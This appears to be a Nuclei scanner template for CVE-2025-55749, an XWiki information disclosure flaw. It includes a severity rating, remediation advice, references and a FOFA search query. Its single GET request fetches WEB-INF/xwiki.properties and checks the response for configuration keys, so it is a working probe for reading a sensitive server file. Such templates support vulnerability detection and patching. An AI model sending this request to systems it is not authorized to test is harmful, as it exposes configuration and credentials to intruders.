id: CVE-2025-55749 info: name: XWiki - Information Disclosure author: DhiyaneshDk severity: high description: | XWiki 16.7.0 to 16.10.11, 17.4.4, and 17.7.0 using XJetty contains an information disclosure vulnerability caused by exposed context allowing static access to files in webapp/ folder, letting attackers access sensitive files, exploit requires use of XJetty package. impact: | Attackers can access sensitive files including credentials, leading to information disclosure. remediation: | Update to versions 16.10.11, 17.4.4, or 17.7.0 or later. reference: - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-53gx-j3p6-2rw9 - https://nvd.nist.gov/vuln/detail/CVE-2025-55749 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2025-55749 epss-score: 0.01409 epss-percentile: 0.69817 cwe-id: CWE-284 metadata: verified: true max-request: 1 fofa-query: app="XWIKI-Platform" tags: cve,cve2025,xwiki,exposure,vuln,vkev http: - method: GET path: - "{{BaseURL}}/webapps/xwiki/WEB-INF/xwiki.properties" matchers-condition: and matchers: - type: word part: response words: - "diff.xml.dataURI" - "core.renderingcache.enabled" condition: and - type: status status: - 200 # digest: 4a0a004730450221008a51c324d72f42587735a92a5bef3c7376ad8d3f354ad635d947ddea86c5d75402201b3cf004fd34b678fc57fdb6c0bf5cbacbb2c5498829d76439744eea8a7d57d2:922c64590222798bb761d5b6d8e72950